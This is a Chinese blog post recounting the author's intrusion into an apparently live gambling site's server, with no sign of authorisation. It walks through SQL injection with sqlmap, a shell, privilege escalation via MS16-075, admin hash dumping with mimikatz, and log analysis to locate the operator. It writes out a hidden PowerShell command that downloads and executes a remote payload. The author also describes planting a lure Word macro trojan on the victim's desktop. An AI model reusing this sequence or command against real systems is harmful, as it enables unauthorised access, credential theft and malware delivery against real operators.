记一次拿下棋牌服务器的过程

  • A+
所属分类:安全文章

写完这篇文章后突然感觉好像没啥技术含量~将就看~~



通过某个不知名的老哥共享的指纹信息,找到了一个棋牌站点


前台页面长这样:


记一次拿下棋牌服务器的过程


后台页面长这样:

记一次拿下棋牌服务器的过程


后台登录处,参数userName存在sql注入,判断了下没有waf,先直接丢入sqlmap一把梭

记一次拿下棋牌服务器的过程


想着先进后台看看后台长啥样,于是跑了下用户的账号密码,然后发现跑出来的密码乱码,网上找了各种如指定编码啥的都不行。(懒得再跑一遍了,卡的一笔,直接截图sqlmap日志)

记一次拿下棋牌服务器的过程


于是乎想到了一个办法,通过--sql-shell 来获得一个sqlshell,然后直接执行sql语句试试看。

因为我们在前面跑的过程中已经知道了表名,那就直接执行SqlServer的语句来查询试试会不会乱码。

记一次拿下棋牌服务器的过程


果然可行,没有乱码。

不过...这串md5看起来好眼熟的样子...

记一次拿下棋牌服务器的过程


啊这...我为啥开局只试了个admin/admin的弱口令....无语


记一次拿下棋牌服务器的过程


终于看到后台长啥样了~~


尝试看看能不能拿下服务器权限,服务器是阿里云的。

我这边直接利用之前的注入点获得一个交互式shell看看什么权限。


记一次拿下棋牌服务器的过程


意料之中,service权限,想个办法提权先。本来是尝试先上传检测程序看看该系统缺失哪些补丁然后找对应的exp进行提权,不过发现该服务器只有一个c盘,且找不到一个可以写的目录。


为了速度快一点且方便一点,我这边直接反弹一个shell到自己的服务器去执行。

记一次拿下棋牌服务器的过程


又是在笔记中一通乱翻,终于找到了一个办法,那就是利用powershell远程执行ps1脚本。

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))"


先上一个cs再说,用cs生成一个powershell的payload去执行了一下。

然后郁闷的时候出现了,我的hfs中有下载,但是对方的服务器没有回连上线。

tasklist看了下也没有powershell进程,估计是失败了?


这个是昨天晚上弄得,由于第二天要起得很早,所以就没有再继续了。


但是,当我今天打开我的cs客户端的时候,发现...

记一次拿下棋牌服务器的过程

因为当时没上线,所以多执行了几次..

看了眼cs日志,发现是大半夜了才上线的

记一次拿下棋牌服务器的过程

emmm..好吧,看来昨晚是他们服务器卡了...


现在还是service权限,但是处境比之前好多了,看了下服务器的类型和补丁后,直接怼exp。我这里用的是ms16-075。

记一次拿下棋牌服务器的过程

记一次拿下棋牌服务器的过程


ok,system权限了。用mimikatz抓一下管理员的hash

记一次拿下棋牌服务器的过程


看了下管理员现在没在线

记一次拿下棋牌服务器的过程


登上去看看先~(卡的一笔)

记一次拿下棋牌服务器的过程


看看能不能找出点棋牌运营者的信息出来。

看桌面上有个百度网盘,点开后发现没有登录信息~~


直接查看系统日志,筛选登录日志,由于有可能不是一个人在登录(可能哪位大黑阔早就进去了也说不定)或者是管理员在不同地方登录或者是挂了代理登录......

于是把日志先全部导出到本地,然后提取所有登录ip,再取出ip次数最多的那个,大概率就是管理员的ip了。

由于家庭宽带的ip基本上是动态的,但是地理位置都是接近的,根据地理位置最多的来判断。

记一次拿下棋牌服务器的过程

记一次拿下棋牌服务器的过程


想尝试能不能拿到更多管理员的信息,于是制作了一个office宏木马

记一次拿下棋牌服务器的过程


因为要手动点击启用宏,所以内容稍微诱导下

记一次拿下棋牌服务器的过程

然后插入宏代码,并保存为可执行宏的word文档。

记一次拿下棋牌服务器的过程


最后放到服务器桌面显眼的地方...

记一次拿下棋牌服务器的过程


hvv重启第一天看到wps的0day流出来了,网上也有免手工启用宏的exp,不过还是选择用最原始的方法,因为管理员用的是wps还是office不清楚..而且之前的exp很大概率用不了,毕竟都两三年了,补丁应该已经打了。由于没有做免杀,上线的成功率很低~~(不过还是放一点点期待吧,毕竟我最近买什么股票,什么股票就连续跌停~我觉得是时候反转一下了...)


如果真的上线了,后续再发文~



记一次拿下棋牌服务器的过程


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: